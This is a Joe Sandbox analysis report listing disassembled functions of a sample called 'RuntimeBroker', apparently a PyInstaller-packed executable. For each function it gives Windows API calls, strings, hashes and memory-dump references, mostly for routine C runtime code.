Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
Instruction ID: cac5786549ca903f74ed64aa25f920d8e82d03e6fc1201d8e18ba49ae5b43b79
Opcode Fuzzy Hash: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
Instruction Fuzzy Hash: 3A41B372A1978641EB31AF19A8802BAB394FF84B84F844035DF9C57BA9DE3CE401CF14

Function 00007FF72B058400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B057B50: GetCurrentProcess.KERNEL32 ref: 00007FF72B057B70
Part of subcall function 00007FF72B057B50: OpenProcessToken.ADVAPI32 ref: 00007FF72B057B83
Part of subcall function 00007FF72B057B50: GetTokenInformation.KERNELBASE ref: 00007FF72B057BA8
Part of subcall function 00007FF72B057B50: GetLastError.KERNEL32 ref: 00007FF72B057BB2
Part of subcall function 00007FF72B057B50: GetTokenInformation.KERNELBASE ref: 00007FF72B057BF2
Part of subcall function 00007FF72B057B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B057C0E
Part of subcall function 00007FF72B057B50: CloseHandle.KERNEL32 ref: 00007FF72B057C26

LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B05848C
LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B058495

Strings

D:(A;;FA;;;%s), xrefs: 00007FF72B058477
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF72B0584A3
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF72B058462
S-1-3-4, xrefs: 00007FF72B058441

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
Instruction ID: ba575d771b70e856a571d81c72c269d89e6245f365fd0fd7f31ccbc91f0e098f
Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
Instruction Fuzzy Hash: F2212B61A0864681F662BB18EC553FAA2A0FB88780FC44435EA4D53BA6DE3CE545CB60

Function 00007FF72B052870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

MessageBoxW.USER32 ref: 00007FF72B052906
MessageBoxA.USER32 ref: 00007FF72B05291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF72B05290E
Warning, xrefs: 00007FF72B0528F7

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: 6fdff204d2bd53b1c08c4d5f8845a223bb5b3ed99a58e59af63a3c8d35ed5717
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 06119072628B8581FB32AB04F865BA9B364FF48784FD05135DA8D47A64DF3CD604CB50

Function 00007FF72B06C270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C417

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction ID: e41ac4792b681674c8542f6d936e68fe1e6478a3726100afa7ef545ad91e4126
Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction Fuzzy Hash: 9E91B662B0865185F772EF6D9C4037DA7A0FB58B88F94413DDE0E57AA5DE3CD4818B20

Function 00007FF72B064938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B064965
CreateFileW.KERNELBASE ref: 00007FF72B0649A4
CloseHandle.KERNEL32 ref: 00007FF72B0649D9

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: c7dfdb86f8e7b35c32b853fdb9aa5c213066ecb37e5093cdda27ef89ebd06a0e
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: D341C532E1878143E365AB25995037DA260FF98764F549338D65C43AE9DF7CA1E08B20

Function 00007FF72B05BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B05C12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF72B05C140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF72B05BF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF72B05BFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF72B05C041

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: 9e72c2b248a69c027bca582dbd90e284560123b00cf7dd4417d90ab532dc5979
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 40311A11A0864241FA76BB6C9CA53B99281FF45788FD41039EA0E47AF3DE2CF9458F35

Function 00007FF72B068D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF72B068D44), ref: 00007FF72B068D59
TerminateProcess.KERNEL32(?,?,?,00007FF72B068D44), ref: 00007FF72B068D64
ExitProcess.KERNEL32 ref: 00007FF72B068D73

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: 4c7431cefc51d2c3c4bc47c3569015e8213f3c240b820131c7022439265ddbcd
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: 1ED06710B1970687EA7A3B785C691799351AF9C741F90143DD84A0A3B3DD2CA8495E74

Function 00007FF72B05F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B05F4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B05F597

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction ID: b3ce195ae496e00d581070107994c9237756ac34ca31e6f61d1ed744f826caba
Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction Fuzzy Hash: E551B961B0924245E636BF2D9D8067AE291FF44BA4F944634DE6D47BF5CE3CE4018F20

Function 00007FF72B069E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069ED6
GetLastError.KERNEL32(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069EE0

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 2f4644afd922b1e5157689ef8598afdfcdafe112b50f9db75b69ec44e89d1eca
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: 1721A721F1C64241EE7A7769AD5037D9291DF8C7A0F88423DDA2E47BF6CE6CE5404B20

Function 00007FF72B06B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF72B06B5DD), ref: 00007FF72B06B490
GetLastError.KERNEL32(?,?,?,?,?,00007FF72B06B5DD), ref: 00007FF72B06B49A

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: 2a842859367c16081b218a64e9adb14f58672a61e5e86746a8b65955b8c079ef
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 5311BFA1B08A8181DA21AB29AC44179E361FB48BF4F980335EE7D077FACF3CD1508B40

Function 00007FF72B069C58 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: 281bdd135021f22db46c3dbebf66492c632967ec5f0fb55460ac849649947edb
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: 53E08650F0864242FF3A7BFA6C5407D9191EF9C740BC44038D90D47271EE2CA5454A30

Function 00007FF72B06B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06B1E4

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 12270a8a75ca09993c8c8368b0e1ad6c6286b94bc4b5dc24b1707c41ed112153
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4C41B972B0820247EA35AB1DA95227DB3A0EF5D781F940139DA9D476B1CF3CE503CB61

Function 00007FF72B0576A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF72B05774A

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 770b6ab2df97d2559a6c10fc1b5dfeed8426fccf61b1cdbe3e1d7fcdeac4d843
Instruction ID: 77c8f901887c23e37d59c76d917a642e40c7612d2bb5bf4fdfcb01d6e1cc520e
Opcode Fuzzy Hash: 770b6ab2df97d2559a6c10fc1b5dfeed8426fccf61b1cdbe3e1d7fcdeac4d843
Instruction Fuzzy Hash: 84219321B0865546FA32BB1A6D443BAD645FF49BC4FC88430DE0C07BA6DE3DE041CB10

Function 00007FF72B06AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06ACD2

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: 15a7f94d2434b57da418998f74f7be344362384a7cc11d0d0c793e61bd31752c
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: 08317E21F1865286E773BB1E9C4137DA650EF58BA5F950139DA2D033F2DE7CA8818B30

Function 00007FF72B068C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B068CA7

Part of subcall function 00007FF72B068DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF72B068DC5
Part of subcall function 00007FF72B068DA0: GetProcAddress.KERNEL32 ref: 00007FF72B068DDB
Part of subcall function 00007FF72B068DA0: FreeLibrary.KERNEL32 ref: 00007FF72B068E02

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: 10796378ce4140bf13a9ac4e117c5cf7332a2d6c647b6b2057e01cf8758d3830
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: 10219132B157058DEB26AF68D8442EC73A0FB48368F84463AD61C06AE5EF78E444CF64

Function 00007FF72B0652A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B065209

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 4fc0c5960fc2bc28e91f2ae739c4df15e835f4aa3d209fe586e70b95d2e2add0
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: DB113021B1964641EA76BF59981027EE2A4EF5AB80F844439EB4C57AA6CE3CD5408B60

Function 00007FF72B075664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B075687

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: 38d1c4e4a4bab0ee81f23f05f374cced832a0f36c7ed4e4d17e28152245e4a1e
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 3E215672A18A4186DB729F1CE8403BDF660EB94B94F944234D65D476EADF3DD800DF10

Function 00007FF72B05F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B05F730

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: 42c3af35cf93cdc92a3a1f1ecd281f13aa4051c7f03cfa7541adcb7727036003
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
